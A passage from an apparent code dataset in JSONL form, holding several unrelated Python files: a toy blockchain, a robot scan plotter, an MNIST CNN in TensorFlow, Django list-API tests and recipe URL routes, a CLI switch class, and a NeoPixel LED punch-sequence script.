digest.finalize()\n\n\nclass block:\n def __init__(self, trxn: str, prev_block):\n self.data = data_block(data_trxn=trxn)\n self.meta = meta_block(data=self.data, prev_data=prev_block.data)\n\n\nif __name__ == \"__main__\":\n gb = genesys_block()\n # logging.debug(f\"Module : block :: Class : - :: Method : __main__ :: property : genesys_block :: value : {gb.data.__str__()}\")\n b0 = block(trxn=\"GAN1\", prev_block=gb)\n print(f\"ID : {b0.meta.uuid}\\nHash : {b0.meta.hash}\\nLink : {b0.meta.link}\\n\")\n b1 = block(trxn=\"GAN2\", prev_block=b0)\n print(f\"ID : {b1.meta.uuid}\\nHash : {b1.meta.hash}\\nLink : {b1.meta.link}\\n\")\n b2 = block(trxn=\"GAN3\", prev_block=b1)\n print(f\"ID : {b2.meta.uuid}\\nHash : {b2.meta.hash}\\nLink : {b2.meta.link}\\n\")\n","repo_name":"charudatta10/web3","sub_path":"src/block.py","file_name":"block.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"1544988840","text":"# Plot a scan of the robot using matplotlib.\n#TOTAL SCAN 
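The block and meta_block classes in the snippet above implement a hash chain: each block stores the SHA-256 of its own data plus the SHA-256 of the previous block's data. The same idea with only the standard library (hashlib instead of the cryptography package):

import hashlib

def block_hash(data):
    return hashlib.sha256(data.encode('utf-8')).hexdigest()

prev_hash = block_hash('GAN0')  # genesis block
for trxn in ('GAN1', 'GAN2', 'GAN3'):
    link = prev_hash            # pointer to the previous block's data hash
    prev_hash = block_hash(trxn)
    print(trxn, 'hash:', prev_hash[:12], 'link:', link[:12])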
= 660\n\nfrom pylab import *\nfrom lego_robot import *\nn=int(input(\"enter the scan number-..\"))\n# Read the logfile which contains all scans.\nlogfile = LegoLogfile()\nlogfile.read(\"robot4_scan.txt\")\n\n# Plot one scan.\nplot(logfile.scan_data[n])\nshow()\n","repo_name":"marsiitr/RoverSim","sub_path":"src/EKF SLAM/landmark extraction/plot_scan.py","file_name":"plot_scan.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"43679370618","text":"import os\nimport logging\nimport time\nimport tensorflow as tf\nimport numpy as np\nimport sys\nimport shutil\nfrom numpy import sqrt\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport matplotlib.pyplot as plt\nfrom utils import *\nfrom sklearn.metrics import confusion_matrix\n\nMODEL_NAME = os.path.basename(os.path.splitext(__file__)[0])\nlogger = get_logger(MODEL_NAME)\n\nSAVED_MODEL_PATH = \"{}/\".format(MODEL_NAME)\nnp.set_printoptions(threshold=np.nan)\ntf.set_random_seed(deterministic_seed)\ndata = input_data.read_data_sets('MNIST-data', one_hot=True)\n\ndata.test.cls = np.array([label.argmax() for label in data.test.labels])\ndata.train.cls = np.array([label.argmax() for label in data.train.labels])\n\n\"\"\" The actual model \"\"\"\nx = tf.placeholder(tf.float32, [None, img_size_flat], name=\"image\")\ny_true = tf.placeholder(tf.float32, [None, num_classes], name=\"y_true\")\ny_true_cls = tf.argmax(y_true, axis=1)\n\n# First convolutional layer\nx_image = tf.reshape(x, [-1, 28, 28, 1])\n\nweights1 = get_weights([5, 5, 1, 32])\nbiases1 = get_bias([32])\nh_conv1 = tf.nn.relu(tf.nn.conv2d(x_image, weights1, strides=[1, 1, 1, 1], padding='SAME') + biases1)\nh_pool1 = tf.nn.max_pool(h_conv1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\n\n# Second convolutional layer\nweights2 = get_weights([5, 5, 32, 64])\nbiases2 = get_bias([64])\n\nh_conv2 = tf.nn.relu(tf.nn.conv2d(h_pool1, weights2, strides=[1, 1, 1, 1], padding='SAME') + biases2)\nh_pool2 = tf.nn.max_pool(h_conv2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\n\n# First fully connected:\nweights_fully_connected1 = get_weights([7 * 7 * 64, 1024])\nbiases_fully_connected1 = get_bias([1024])\n\nh_pool2_flat = tf.reshape(h_pool2, [-1, 7 * 7 * 64])\nh_fully_connected1 = tf.nn.relu(tf.matmul(h_pool2_flat, weights_fully_connected1) + biases_fully_connected1)\n\n# Second fully connected\nweights_fully_connected2 = get_weights([1024, num_classes])\nbiases_fully_connected2 = get_bias([num_classes])\n\nh_fully_connected2 = tf.matmul(h_fully_connected1, weights_fully_connected2) + biases_fully_connected2\n\n# Softmax!\ny_pred = tf.nn.softmax(h_fully_connected2)\ny_pred_cls = tf.argmax(y_pred, axis=1)\n\ncross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits=h_fully_connected2, labels=y_true)\ncost = tf.reduce_mean(cross_entropy)\n\noptimizer = tf.train.AdamOptimizer(learning_rate=1e-4).minimize(cost)\n\ncorrect_prediction = tf.equal(y_pred_cls, y_true_cls)\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nsaver = tf.train.Saver()\n\ncurrent_batch = 0\nnumber_of_iterations = 10000\nwith tf.Session(config=config) as sess:\n sess.run(tf.global_variables_initializer())\n if len(sys.argv) != 2:\n raise ValueError(\"Wrong number of parameters\")\n\n if sys.argv[1] == \"train\":\n shutil.rmtree(SAVED_MODEL_PATH, ignore_errors=True)\n for i in 
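A quick sanity check on the layer sizes in the MNIST model above: each 'SAME'-padded max-pool with stride 2 halves the spatial dimensions, so two pool stages take 28x28 down to 7x7, which is where the 7 * 7 * 64 flatten size for the first fully connected layer comes from:

def same_pool(size, stride=2):
    # Output size of a 'SAME'-padded pool: ceil(size / stride).
    return (size + stride - 1) // stride

side = 28
for stage in (1, 2):
    side = same_pool(side)
    print('after pool', stage, '->', side, 'x', side)
print('flatten size:', side * side * 64)  # 7 * 7 * 64 == 3136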
range(number_of_iterations):\n            current_batch += 50\n            current_batch %= 55000\n            batch_images = data.train.images[current_batch:current_batch + 50]\n            batch_true = data.train.labels[current_batch:current_batch + 50]\n            if i % 100 == 0:\n                train_accuracy = accuracy.eval(feed_dict={x: batch_images, y_true: batch_true})\n                print(\"step %d, training accuracy: %.4f\" % (i, train_accuracy))\n            if i % 1000 == 0:\n                saver.save(sess=sess, save_path=SAVED_MODEL_PATH)\n            optimizer.run(feed_dict={x: batch_images, y_true: batch_true})\n        saver.save(sess=sess, save_path=SAVED_MODEL_PATH)\n\n    elif sys.argv[1] == \"extract_layers\":\n        saver.restore(sess=sess, save_path=SAVED_MODEL_PATH)\n\n        flatten_h_pool1 = tf.reshape(h_pool1, shape=[-1, 14 * 14 * 32])\n        flatten_h_pool2 = tf.reshape(h_pool2, shape=[-1, 7 * 7 * 64])\n        h_fully_connected1 = tf.reshape(h_fully_connected1, shape=[-1, 1024])\n        h_fully_connected2 = tf.reshape(h_fully_connected2, shape=[-1, 10])\n        batch_size = 200\n        layer_file_names = [\"vanilla_layer_1.txt\", \"vanilla_layer_2.txt\", \"vanilla_layer_3.txt\", \"vanilla_layer_4.txt\"]\n        file_handles = [open(layer_filename, \"a\") for layer_filename in layer_file_names]\n        for i in range(len(data.train.images) // batch_size):\n            dict_to_feed = {x: data.train.images[batch_size * i: batch_size * i + batch_size],\n                            y_true: data.train.labels[batch_size * i: batch_size * i + batch_size]}\n\n            np.savetxt(file_handles[0], flatten_h_pool1.eval(feed_dict=dict_to_feed), fmt=\"%f\")\n            np.savetxt(file_handles[1], flatten_h_pool2.eval(feed_dict=dict_to_feed), fmt=\"%f\")\n            np.savetxt(file_handles[2], h_fully_connected1.eval(feed_dict=dict_to_feed), fmt=\"%f\")\n            np.savetxt(file_handles[3], h_fully_connected2.eval(feed_dict=dict_to_feed), fmt=\"%f\")\n            if i % 10 == 0:\n                print(\"Current iteration: {}\".format(i))\n        [file.close() for file in file_handles]\n    elif sys.argv[1] == \"restore\":\n        saver.restore(sess=sess, save_path=SAVED_MODEL_PATH)\n\n        all_points = np.zeros(len(data.test.images))\n        batch = 100\n        for j in range(len(all_points) // batch):\n            tmp = np.array(data.test.labels[batch * j:batch * j + batch])\n            all_points[batch * j: batch * j + batch] = y_pred_cls.eval(\n                feed_dict={x: np.array(data.test.images[batch * j:batch * j + batch]),\n                           y_true: tmp})\n        cm = confusion_matrix(y_true=data.test.cls, y_pred=all_points)\n\n        all_precisions = []\n        all_recalls = []\n        for i in range(num_classes):\n            precision = get_precision(i, cm)\n            recall = get_recall(i, cm)\n            all_precisions.append(precision)\n            all_recalls.append(recall)\n            print(\"Precision for {}: %.3f\".format(i) % precision)\n            print(\"Recall for {}: %.3f\".format(i) % recall)\n        print(\"Model accuracy: {}\".format(get_model_accuracy(all_points, data.test.cls)))\n        correct = all_points == data.test.cls\n        plot_confusion_matrix_nicely(cm)\n    else:\n        raise ValueError(\"Bad parameter given.\")\n\n","repo_name":"RedPenguin100/ml_project","sub_path":"basic/vanilla_model.py","file_name":"vanilla_model.py","file_ext":"py","file_size_in_byte":6194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"41623349826","text":"import json\nfrom django.test import TestCase\n\nfrom lists.models import List, Item\n\n\nclass ListAPITest(TestCase):\n    \"\"\"List API tests\"\"\"\n    base_url = '/api/lists/{}/'\n\n    def get_list_url(self, list_):\n        return self.base_url.format(list_.id)\n\n    def test_get_returns_json_200(self):\n        \"\"\"\n        Test: returns json and a 200 status code\n        \"\"\"\n        list_ = List.objects.create()\n        response = 
self.client.get(self.get_list_url(list_))\n        self.assertEqual(response.status_code, 200)\n        self.assertEqual(response['content-type'], 'application/json')\n\n    def test_get_returns_items_correct_list(self):\n        \"\"\"\n        Test: the response contains the items of the correct list\n        \"\"\"\n        other_list = List.objects.create()\n        Item.objects.create(list=other_list, text='item 1')\n        correct_list = List.objects.create()\n        item1 = Item.objects.create(list=correct_list, text='item 1')\n        item2 = Item.objects.create(list=correct_list, text='item 2')\n        response = self.client.get(self.get_list_url(correct_list))\n        self.assertEqual(\n            json.loads(response.content.decode('utf8')),\n            [\n                {'id': item1.id, 'text': item1.text},\n                {'id': item2.id, 'text': item2.text}\n            ]\n        )\n\n    def test_POSTing_a_new_item(self):\n        \"\"\"\n        Test: a POST request can create a list item\n        \"\"\"\n        list_ = List.objects.create()\n        response = self.client.post(\n            self.get_list_url(list_),\n            {'text': 'new item'},\n        )\n        self.assertEqual(response.status_code, 201)\n        new_item = list_.item_set.get()\n        self.assertEqual(new_item.text, 'new item')\n","repo_name":"Trofmann/superlists","sub_path":"lists/tests/test_api/test_list.py","file_name":"test_list.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36762073366","text":"import _rightThumb._matrix as _matrix\n\n# ## {R2D2919B742E} ##\n# ###########################################################################\n# What if magic existed?\n# What if a place existed where your every thought and dream come to life.\n# There is only one catch: it has to be written down.\n# Such a place exists, it is called programming.\n# - Scott Taylor Reph, RightThumb.com\n# ###########################################################################\n# ## {C3P0D40fAe8B} ##\n\nimport _rightThumb._base3 as _\nimport time\n\nthisChildApp = _matrix.GenChildLabel.gen( __file__ )\n\nclass TheChild:\n\tdef __init__( self, theID, registration ):\n\t\tself.id = theID\n\t\tself.ids = []\n\t\tself.triggerDefault = None\n\t\tself.registration = registration\n\t\tself.switchDelim = _matrix.switchDelim\n\t\tself.switchDelimReplace = _matrix.switchDelimReplace\n\t\t_matrix.app.sequences['switch']['algorithm'] = {}\n\t\tself.key = None\n\t\tself.add( theID, registration )\n\n\tdef callers( self, trackingID=None ):_.printVar( _matrix.app.algorithmRegister(trackingID=trackingID) );\n\n\n\tdef add( self, theID, registration ):\n\t\talgorithm = _matrix.app.algorithmRegister(trackingID=registration['trackingID'])\n\t\tself.ids.append( theID )\n\t\tself.focus = registration['focus']\n\t\tself.name = registration['name']\n\t\tself.hashID = registration['hashID']\n\n\t\tself.required = False\n\t\tself.pipe = False\n\t\tself.documentation = {}\n\t\t\n\t\tself.isDefault = registration['isDefault']\n\t\tif 'isRequired' in registration.keys():\n\t\t\tself.required = registration['isRequired']\n\t\t\n\t\tif 'isPipe' in registration.keys():\n\t\t\tself.pipe = registration['isPipe']\n\n\t\tif 'example' in registration.keys():\n\t\t\tself.example = registration['example']\n\t\telse:\n\t\t\tself.example = None\n\n\n\t\tif 'expected_input_example' in registration.keys():\n\t\t\tself.expected_input_example = registration['expected_input_example']\n\t\telse:\n\t\t\tself.expected_input_example = None\n\n\n\t\tif 'examples' in registration.keys():\n\t\t\tself.documentation['examples'] = registration['examples']\n\n\t\tif 'required' in 
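One way a view could satisfy the contract pinned down by the tests above; this is a sketch, not the repository's actual implementation (the tests only fix the URL shape, the JSON payload, and the 201-on-POST behaviour):

from django.http import HttpResponse, JsonResponse
from lists.models import List, Item  # same models the tests import

def list_api(request, list_id):
    list_ = List.objects.get(id=list_id)
    if request.method == 'POST':
        Item.objects.create(list=list_, text=request.POST['text'])
        return HttpResponse(status=201)
    items = [{'id': item.id, 'text': item.text} for item in list_.item_set.all()]
    return JsonResponse(items, safe=False)  # safe=False allows a top-level array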
registration.keys():\n\t\t\tself.documentation['required'] = registration['required']\n\n\t\tif 'related' in registration.keys():\n\t\t\tself.documentation['related'] = registration['related']\n\n\t\tif 'description' in registration.keys():\n\t\t\tself.documentation['description'] = registration['description']\n\t\telse:\n\t\t\tself.documentation = None\n\n\t\tself.name = None\n\t\tself.switches = None\n\n\t\tif 'name' in registration.keys():\n\t\t\tself.name = registration['name']\n\t\tif 'n' in registration.keys():\n\t\t\tself.name = registration['n']\n\n\t\tif 'switches' in registration.keys():\n\t\t\tself.switches = registration['switches']\n\t\tif 's' in registration.keys():\n\t\t\tself.switches = registration['s']\n\n\t\tself.appReg = registration['focus']\n\n\n\t\tself.id = theID\n\t\tself.pos = 0\n\t\tself.active = False\n\t\tself.value = ''\n\t\tself.values = []\n\t\tself.script = None\n\t\t_matrix.app.algorithmResult( algorithm, result=None )\n\t\t\n\tdef hasVal( self, trackingID=None ):\n\t\talgorithm = _matrix.app.algorithmRegister(trackingID=trackingID)\n\t\t\n\t\tif len(self.value):\n\t\t\treturn _matrix.app.algorithmResult( algorithm, result=True )\n\t\telse:\n\t\t\treturn _matrix.app.algorithmResult( algorithm, result=False )\n\tdef hv( self, trackingID=None ):\n\t\treturn self.hasVal( trackingID=trackingID )\n\n\tdef l( self, trackingID=None ):\n\t\treturn self.hasVal( trackingID=trackingID )\n\n\n\tdef inV( self, search, trackingID=None ):\n\t\treturn self.inVal( search, trackingID=trackingID )\n\tdef inVal( self, search, trackingID=None ):\n\t\talgorithm = _matrix.app.algorithmRegister(trackingID=trackingID, note=search)\n\t\t\n\t\tresult = False\n\t\tfor val in self.values:\n\t\t\tif search in val:\n\t\t\t\tresult = True\n\t\treturn _matrix.app.algorithmResult( algorithm, result=result )\n\n\tdef isV( self, search, trackingID=None ):\n\t\treturn self.isVal( search, trackingID=trackingID )\n\tdef isVal( self, search, trackingID=None ):\n\t\talgorithm = _matrix.app.algorithmRegister(trackingID=trackingID,note=search)\n\t\t\n\t\tresult = False\n\t\tfor val in self.values:\n\t\t\tif search.lower() == val.lower():\n\t\t\t\tresult = True\n\n\t\treturn _matrix.app.algorithmResult( algorithm, result=result )\n\tdef about( self, trackingID=None ):\n\t\talgorithm = _matrix.app.algorithmRegister(trackingID=trackingID)\n\t\tresult = {\n\t\t\t\t\t'active': self.active,\n\t\t\t\t\t'values': self.values,\n\t\t\t\t\t'value': self.value,\n\t\t} \n\t\treturn _matrix.app.algorithmResult( algorithm, result=result )\n\n\n\tdef isActive( self, trackingID=None ):\n\t\talgorithm = _matrix.app.algorithmRegister(trackingID=trackingID)\n\t\treturn _matrix.app.algorithmResult( algorithm, result=self.active )\n\n\tdef ia( self, trackingID=None ):\n\t\treturn self.isActive( trackingID=trackingID )\n\n\tdef a( self, trackingID=None ):\n\t\treturn self.isActive( trackingID=trackingID )\n\n\n\n\tdef setActive( self, trackingID=None ):\n\t\talgorithm = _matrix.app.algorithmRegister(trackingID=trackingID)\n\t\tself.active = True\n\t\t_matrix.app.algorithmResult( algorithm, result=None )\n\n\tdef setNotActive( self, trackingID=None ):\n\t\talgorithm = _matrix.app.algorithmRegister(trackingID=trackingID)\n\t\tself.active = False\n\t\t_matrix.app.algorithmResult( algorithm, result=None )\n\n\n\n\tdef v( self, data=None, trackingID=None ):\n\t\talgorithm = _matrix.app.algorithmRegister(trackingID=trackingID)\n\t\t\n\t\tif not data is None:\n\t\t\tself.value = self.format(data)\n\t\t\tself.values = 
[self.value]\n\t\t\n\n\n\tdef vs( self, data=None, trackingID=None ):\n\t\talgorithm = _matrix.app.algorithmRegister(trackingID=trackingID)\n\t\t_matrix.app.algorithmResult( algorithm, result=None )\n\n\n\t\tif not data is None:\n\t\t\tfor i,d in enumerate(data):\n\t\t\t\tdata[i] = self.format(d)\n\t\t\tself.values = data\n\t\t\tfor i, v in enumerate(data):\n\t\t\t\tdata[i] = data[i].replace( self.switchDelim, self.switchDelimReplace )\n\t\t\tself.value = self.switchDelim.join( data )\n\t\t\n\n\n\tdef getValue( self, trackingID=None ):\n\t\talgorithm = _matrix.app.algorithmRegister(trackingID=trackingID)\n\t\treturn _matrix.app.algorithmResult( algorithm, result=self.value )\n\n\tdef getValues( self, trackingID=None ):\n\t\talgorithm = _matrix.app.algorithmRegister(trackingID=trackingID)\n\t\treturn _matrix.app.algorithmResult( algorithm, result=self.values )\n\n\n\tdef setValue( self, data, trackingID=None ):\n\t\talgorithm = _matrix.app.algorithmRegister(trackingID=trackingID)\n\t\tself.value = self.format(data)\n\t\t_matrix.app.algorithmResult( algorithm, result=None )\n\n\tdef setValues( self, data, trackingID=None ):\n\t\talgorithm = _matrix.app.algorithmRegister(trackingID=trackingID)\n\n\t\tfor i,d in enumerate(data):\n\t\t\tdata[i] = self.format(d)\n\t\tself.values = data\n\t\tfor i, v in enumerate(data):\n\t\t\tdata[i] = data[i].replace( self.switchDelim, self.switchDelimReplace )\n\t\tself.value = self.switchDelim.join( data )\n\n\t\t_matrix.app.algorithmResult( algorithm, result=None )\n\n\tdef trigger( self, script, trackingID=None ):\n\t\talgorithm = _matrix.app.algorithmRegister(trackingID=trackingID)\n\t\tself.script = script\n\t\t_matrix.app.algorithmResult( algorithm, result=None )\n\n\tdef format( self, data, trackingID=None ):\n\t\talgorithm = _matrix.app.algorithmRegister(trackingID=trackingID)\n\t\t\n\t\tif self.script is None:\n\t\t\treturn _matrix.app.algorithmResult( algorithm, result=data )\n\t\telse:\n\t\t\tresult = self.script( data )\n\t\t\treturn _matrix.app.algorithmResult( algorithm, result=result )\n\n\tdef triggerColumns( self ):\n\t\talgorithm = _matrix.app.algorithmRegister()\n\t\t_matrix.app.algorithmResult( algorithm, result=None )\n\t\tself.triggerDefault = 'Columns'\n\t\tpass\n\n\tdef triggerColumnsSort( self ):\n\t\talgorithm = _matrix.app.algorithmRegister()\n\t\t_matrix.app.algorithmResult( algorithm, result=None )\n\t\tself.triggerDefault = 'ColumnsSort'\n\t\tpass\n\n\tdef triggerAgo( self ):\n\t\talgorithm = _matrix.app.algorithmRegister()\n\t\t_matrix.app.algorithmResult( algorithm, result=None )\n\t\tself.triggerDefault = 'triggerAgo'\n\t\tpass\n\n\tdef dump( self, trackingID=None ):\n\t\talgorithm = _matrix.app.algorithmRegister(trackingID=trackingID)\n\t\tfor i, key in enumerate(_matrix.app.records['switch']):\n\t\t\trecord = _matrix.app.records['switch'][key]\n\t\t\t_.pr( record.focus, record.name, record.active )\n\t\t_matrix.app.algorithmResult( algorithm, result=None )\n\n\n\tdef audit( self, ):\n\t\treturn _matrix.app.callers()\n\n\n# p file + _child --c | p line --c -make \" n {} \"\n\n\n\t\t\n\n\n\n","repo_name":"rightthumb/rightthumb-widgets-v0","sub_path":"widgets/python/_rightThumb/_matrix/_switch_child.py","file_name":"_switch_child.py","file_ext":"py","file_size_in_byte":8119,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"73278686498","text":"from django.urls import path, include\nfrom . 
import views\nfrom django.contrib.auth.decorators import login_required\n\napp_name = 'recipes'\n\nurlpatterns = [\n # Recipe CRUD\n path('', login_required(views.RecipeListView.as_view()), name='recipe-list'),\n path('create/', login_required(views.RecipeCreateView.as_view()), name='recipe-create'),\n path('/', login_required(views.RecipeDetailView.as_view( )), name='recipe-detail'),\n path('/update/', login_required(views.RecipeUpdateView.as_view()), name='recipe-update'),\n path('/delete/', login_required(views.RecipeDeleteView.as_view()), name='recipe-delete'),\n \n # WarehouseIngredient CRUD\n path('/wh-ingredient/create/', login_required(views.WarehouseIngredientCreateView.as_view()), name='wh-ingredient-create'),\n path('/wh-ingredient//', login_required(views.WarehouseIngredientDetailView.as_view()), name='wh-ingredient-detail'),\n path('/wh-ingredient//delete/', login_required(views.WarehouseIngredientDeleteView.as_view()), name='wh-ingredient-delete'),\n path('/wh-ingredient//update/', login_required(views.WarehouseIngredientUpdateView.as_view()), name='wh-ingredient-update'),\n path('/wh-ingredient/', login_required(views.WarehouseIngredientListView.as_view()), name='wh-ingredient-list'),\n\n # NonWarehouseIngredient CRUD\n path('/non-wh-ingredient/create', login_required(views.NonWarehouseIngredientCreateView.as_view()), name='non-wh-ingredient-create'),\n path('/non-wh-ingredient//', login_required(views.NonWarehouseIngredientDetailView.as_view()), name='non-wh-ingedient-detail'),\n path('/non-wh-ingredient//update/', login_required(views.NonWarehouseIngredientUpdateView.as_view()), name='non-wh-ingredient-update'),\n path('/non-wh-ingredient//delete/', login_required(views.NonWarehouseIngredientDeleteView.as_view()), name='non-wh-ingredient-delete'),\n path('/non-wh-ingredient/', login_required(views.NonWarehouseIngredientListView.as_view()), name='non-wh-ingredient-list'),\n\n # NonWarehouseProduct CRUD\n path('non-wh-product/', login_required(views.NonWarehouseProductListView.as_view()), name='non-wh-product-list'),\n path('non-wh-product/create/', login_required(views.NonWarehouseProductCreateView.as_view()), name='non-wh-product-create'),\n path('non-wh-product//', login_required(views.NonWarehouseProductDetailView.as_view()), name='non-wh-product-detail'),\n path('non-wh-product//update/', login_required(views.NonWarehouseProductUpdateView.as_view()), name='non-wh-product-update'),\n path('non-wh-product//delete/', login_required(views.NonWarehouseProductDeleteView.as_view()), name='non-wh-product-delete'),\n]","repo_name":"JOSELAGOSG/Chocolates53SurDEMO","sub_path":"recipe_cost_calculator/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6826290006","text":"import neopixel\r\nimport threading\r\nimport xml.etree.ElementTree as ET\r\nimport time\r\nfrom pifighterinit import *\r\n\r\n# Setting up the various colours\r\nLEFT_PUNCH_COLOUR = neopixel.Color(255,0,0)\r\nRIGHT_PUNCH_COLOUR = neopixel.Color(0,255,0)\r\nLEFT_KICK_COLOUR = neopixel.Color(255,0,50)\r\nRIGHT_KICK_COLOUR = neopixel.Color(0,255,100)\r\nWAIT_COLOUR = neopixel.Color(0,0,255)\r\nNO_STATE_COLOUR = neopixel.Color(0,0,0)\r\nFINISHED_COLOUR = neopixel.Color(255,255, 255)\r\n\r\n# KickButt Mode Colours\r\nVERY_HEALTHY_COLOUR = neopixel.Color(0,100,0) # RGB\r\nDAMAGED_COLOUR = neopixel.Color(100,100,0)\r\nDANGER_COLOUR = neopixel.Color(100,0,0)\r\nKO_COLOUR = 
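The URLconf above wraps every class-based view in login_required by hand. An equivalent, less repetitive option is LoginRequiredMixin on the view classes themselves; a sketch, with RecipeListView standing in for any of the views above (its body is whatever the existing view already defines):

from django.contrib.auth.mixins import LoginRequiredMixin
from django.views.generic import ListView

class RecipeListView(LoginRequiredMixin, ListView):
    # model/queryset/template as in the existing view; the mixin alone
    # makes unauthenticated requests redirect to the login page.
    pass

With the mixin in place, the URL line shrinks to path('', views.RecipeListView.as_view(), name='recipe-list').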
neopixel.Color(0,0,100)\r\n\r\n# WS2812 - LED strip configuration:\r\nLED_COUNT = 16 # Number of LED pixels. 0-7 on right 8-15 on left.\r\nLED_PIN = 18 # GPIO pin connected to the pixels (must support PWM!).\r\nLED_FREQ_HZ = 800000 # LED signal frequency in hertz (usually 800khz)\r\nLED_DMA = 5 # DMA channel to use for generating signal (try 5)\r\nLED_BRIGHTNESS = 255 # Set to 0 for darkest and 255 for brightest\r\nLED_INVERT = False # True to invert the signal (when using NPN transistor level shift)\r\n\r\ndef InitStrip():\r\n\tglobal strip \r\n\t\r\n\t# Create NeoPixel object with appropriate configuration.\r\n\tstrip = neopixel.Adafruit_NeoPixel(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA, LED_INVERT, LED_BRIGHTNESS)\r\n\r\n\t# Intialize the library (must be called once before other functions).\r\n\tstrip.begin()\r\n\r\n# Thread to handle the Attack sequences\r\nclass AttackSeqThread (threading.Thread):\r\n\tdef __init__(self, threadID, name, counter):\r\n\t\tthreading.Thread.__init__(self)\r\n\t\tself.threadID = threadID\r\n\t\tself.name = name\r\n\t\tself.counter = counter\r\n\tdef run(self):\r\n\t\tprint (\"Starting \" + self.name)\r\n\t\t#print_time(self.name, self.counter, 5)\r\n\t\tRunPunchSequence()\r\n\t\tprint (\"Exiting \" + self.name)\r\n\r\n\r\n\t\t\r\n# Runs the Punch Sequence - expected go be run as a separate thread, so it can happen in parallell. \r\ndef RunPunchSequence():\r\n\tglobal strip \r\n\tglobal STD_PUNCH_WAIT\r\n\tglobal CMD_FLASH_TIME\r\n\tglobal BETWEEN_SEQ_REST\r\n\t\r\n\t# Read in the sequences from the XML file.\r\n\tSequenceTree = ET.parse('pi-fighter_seq.xml')\r\n\tSeq_root = SequenceTree.getroot()\r\n\t#print (Seq_root.tag)\r\n\t\r\n\t# Start from last pixel in the strip. \r\n\tCurrentPixel = strip.numPixels() - 1\r\n\t\r\n\tfor Sequence in Seq_root:\r\n\t\t\r\n\t\tprint (Sequence.attrib)\r\n\t\t#device.show_message(Sequence.attrib, font=proportional(CP437_FONT), delay = 0.05)\r\n\t\t#time.sleep(.4)\r\n\r\n\r\n\t\tfor Command in Sequence:\r\n\t\t\tPixelState = [NO_STATE_COLOUR, NO_STATE_COLOUR, NO_STATE_COLOUR, NO_STATE_COLOUR, \r\n\t\t\t NO_STATE_COLOUR, NO_STATE_COLOUR, NO_STATE_COLOUR, NO_STATE_COLOUR,\r\n\t\t\t\t\t\t\tNO_STATE_COLOUR, NO_STATE_COLOUR, NO_STATE_COLOUR, NO_STATE_COLOUR, \r\n\t\t\t NO_STATE_COLOUR, NO_STATE_COLOUR, NO_STATE_COLOUR, NO_STATE_COLOUR]\r\n\t\t\t\t\t\t\t\r\n\t\t\t#print (Command.tag)\r\n\t\t\tif Command.tag == 'Attack':\r\n\t\t\t\tfor Attack in Command:\r\n\t\t\t\t\t#print (Attack.tag)\r\n\t\t\t\t\t#print (Attack.text)\r\n\t\t\t\t\r\n\t\t\t\t\tif Attack.tag == 'Punch':\t\t\t\t\t\r\n\t\t\t\t\t\t#print(Attack.text)\r\n\t\t\t\t\t\t# Set the colour according to left or right\r\n\t\t\t\t\t\tif Attack.text == 'Left' : \r\n\t\t\t\t\t\t\tAttackColour = LEFT_PUNCH_COLOUR\r\n\t\t\t\t\t\t\tfor i in range (12,16):\r\n\t\t\t\t\t\t\t\tPixelState[i] = AttackColour\r\n\t\t\t\t\t\telif Attack.text == 'Right' :\r\n\t\t\t\t\t\t\tfor i in range (0,4):\r\n\t\t\t\t\t\t\t\tAttackColour = RIGHT_PUNCH_COLOUR\r\n\t\t\t\t\t\t\t\tPixelState[i] = AttackColour\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tAttackColour =0\r\n\t\t\t\t\t\t\tprint (\"Unrecognised text\", Attack.text)\r\n\t\t\t\t\t\r\n\t\t\t\t\t\tif AttackColour != 0:\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\t\tfor i in range (0,16):\r\n\t\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\t\t# Set the current pixel as required by the punch sequence - use half the time to display, \r\n\t\t\t\t\t\t\t\t# half off so it is sequence can have 2 of the same in a row\r\n\t\t\t\t\t\t\t\tstrip.setPixelColor(i, PixelState[i]) # Actual strip is 
Green Red Blue, so swap colours around\r\n\t\t\t\t\t\t\tstrip.show()\r\n\t\t\t\t\t\t\ttime.sleep(CMD_FLASH_TIME/1000)\r\n\r\n\t\t\t\t\t\t\tfor i in range (0,16):\r\n\t\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\t\t# Set the current pixel as required by the punch sequence - use half the time to display, \r\n\t\t\t\t\t\t\t\t# half off so it is sequence can have 2 of the same in a row\r\n\t\t\t\t\t\t\t\tstrip.setPixelColor(i, neopixel.Color(0,0,0)) # Actual strip is Green Red Blue, so swap colours around\r\n\r\n\t\t\t\t\t\t\tstrip.show()\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\t\t\r\n\t\t\t\t\tif Attack.tag == 'Kick':\t\t\t\t\t\r\n\t\t\t\t\t\t#print(Attack.text)\r\n\t\t\t\t\t\t# Set the colour according to left or right\r\n\t\t\t\t\t\tif Attack.text == 'Left' : \r\n\t\t\t\t\t\t\tAttackColour = LEFT_KICK_COLOUR\r\n\t\t\t\t\t\t\tfor i in range (8,12):\r\n\t\t\t\t\t\t\t\tPixelState[i] = AttackColour\r\n\t\t\t\t\t\telif Attack.text == 'Right' :\r\n\t\t\t\t\t\t\tfor i in range (4,8):\r\n\t\t\t\t\t\t\t\tAttackColour = RIGHT_KICK_COLOUR\r\n\t\t\t\t\t\t\t\tPixelState[i] = 